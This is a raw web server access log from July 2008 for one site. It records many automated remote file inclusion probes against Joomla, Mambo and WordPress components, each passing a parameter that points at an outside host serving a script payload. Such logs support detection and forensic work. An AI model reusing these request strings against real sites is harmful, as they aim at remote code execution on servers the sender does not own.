64.15.138.183 - - [27/Jul/2008:17:17:17 -0700] "GET /logs/access_080526.log//index.php?p=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:17:23 -0700] "GET /logs/access_071008.log//index.php?p=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:17:23 -0700] "GET //index.php?p=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:17:24 -0700] "GET /logs//index.php?p=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:17:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:17:49 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:17:18:39 -0700] "GET /logs/access_080526.log//index.php?p=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.222.40.12 - - [27/Jul/2008:17:19:39 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:17:19:56 -0700] "GET /logs/access_071217.log/index.php?body=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:17:20:06 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:17:20:09 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.53.83 - - [27/Jul/2008:17:20:48 -0700] "GET /logs/access_080210.log/core.php?CONFIG[pear_dir]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:50 -0700] "GET /logs/access_080526.log//index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:50 -0700] "GET /logs/access_080526.log//index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:50 -0700] "GET //index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:50 -0700] "GET //index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:51 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.126.108.198 - - [27/Jul/2008:17:21:51 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://lastra.dk///cache/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.17.3.26 - - [27/Jul/2008:17:22:14 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:22:20 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:22:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:22:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.18.151.242 - - [27/Jul/2008:17:22:23 -0700] "GET //step_one.php?server_inc=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.53.83 - - [27/Jul/2008:17:22:47 -0700] "GET /logs/core.php?CONFIG[pear_dir]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.53.83 - - [27/Jul/2008:17:22:47 -0700] "GET /core.php?CONFIG[pear_dir]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:23:10 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:23:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:23:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:23:15 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:23:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
98.129.33.59 - - [27/Jul/2008:17:23:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.property.co.ke/img/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:24:07 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:24:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.7.207.104 - - [27/Jul/2008:17:24:08 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:24:49 -0700] "GET /logs/access_071224.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:24:49 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:24:49 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
80.78.83.42 - - [27/Jul/2008:17:25:22 -0700] "GET /logs/access_080107.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.78.83.42 - - [27/Jul/2008:17:25:22 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.78.83.42 - - [27/Jul/2008:17:25:22 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.55.212.18 - - [27/Jul/2008:17:25:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.212.18 - - [27/Jul/2008:17:25:25 -0700] "GET /logs/?M=A HTTP/1.0" 200 10646 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
80.78.83.42 - - [27/Jul/2008:17:25:30 -0700] "GET /logs/access_080114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.6.18.240 - - [27/Jul/2008:17:26:12 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
72.9.145.107 - - [27/Jul/2008:17:27:21 -0700] "GET /logs//?page=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 200 10667 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
72.9.145.107 - - [27/Jul/2008:17:27:21 -0700] "GET //?page=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:28:15 -0700] "GET /logs/access_071231.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:28:15 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:28:15 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
216.246.53.83 - - [27/Jul/2008:17:29:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
200.31.206.138 - - [27/Jul/2008:17:30:13 -0700] "GET /logs/access_080427.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.98.71 - - [27/Jul/2008:17:30:36 -0700] "GET /logs/core.php?CONFIG[pear_dir]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.98.71 - - [27/Jul/2008:17:30:36 -0700] "GET /core.php?CONFIG[pear_dir]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:31:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:31:12 -0700] "GET /logs/access_071224.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:31:12 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:31:13 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.222.40.12 - - [27/Jul/2008:17:32:05 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:32:14 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:32:15 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:32:15 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
199.237.232.25 - - [27/Jul/2008:17:32:25 -0700] "GET //index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:32:32 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
80.78.83.42 - - [27/Jul/2008:17:33:43 -0700] "GET /logs/access_080107.log%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:34:22 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:34:27 -0700] "GET /logs/index.php?include=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:34:27 -0700] "GET /logs/access_071224.log/index.php?include=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:34:27 -0700] "GET /index.php?include=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:34:48 -0700] "GET /logs/access_071231.log/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:34:48 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:34:49 -0700] "GET /logs/index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
201.218.236.2 - - [27/Jul/2008:17:34:57 -0700] "GET /logs/access_071021.log/index.php?include=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
65.98.67.106 - - [27/Jul/2008:17:35:13 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:17:35:21 -0700] "GET /logs/access_080210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:17:35:40 -0700] "GET /logs/access_071022.log/core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:17:35:41 -0700] "GET /core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.148.187.90 - - [27/Jul/2008:17:35:41 -0700] "GET /logs/core.php?CONFIG[pear_dir]=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:35:45 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:35:45 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:35:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:37:01 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:37:22 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:37:22 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:37:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.17.3.26 - - [27/Jul/2008:17:37:25 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.17.3.26 - - [27/Jul/2008:17:37:25 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.17.3.26 - - [27/Jul/2008:17:37:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
201.17.3.26 - - [27/Jul/2008:17:37:32 -0700] "GET /logs/access_080310.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fmmc.info/doc/.redeye/.cmd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:37:37 -0700] "GET /logs/access_070827.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:38:10 -0700] "GET /logs/core.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:38:11 -0700] "GET /core.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:17:39:48 -0700] "GET /logs/access_080526.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:40:05 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
58.65.228.5 - - [27/Jul/2008:17:40:05 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:40:25 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:40:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:40:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.198.180.10 - - [27/Jul/2008:17:40:53 -0700] "GET /index.php?pagina=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [27/Jul/2008:17:41:11 -0700] "GET /logs/access_071022.log/core.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET //ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET /logs//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:19 -0700] "GET /logs/access_080204.log//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:25 -0700] "GET /logs/access_080121.log//ask_password.php?dir=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:56 -0700] "GET /logs/access_080204.log//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:57 -0700] "GET /logs//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:41:57 -0700] "GET //ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:17:42:06 -0700] "GET /logs/access_080121.log//ask_password.php?dir=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.173.68 - - [27/Jul/2008:17:42:31 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.38.54.160 - - [27/Jul/2008:17:46:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ettoresquillace.com/htdocs/modules/tinycontent/admin/spaw/dialogs/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
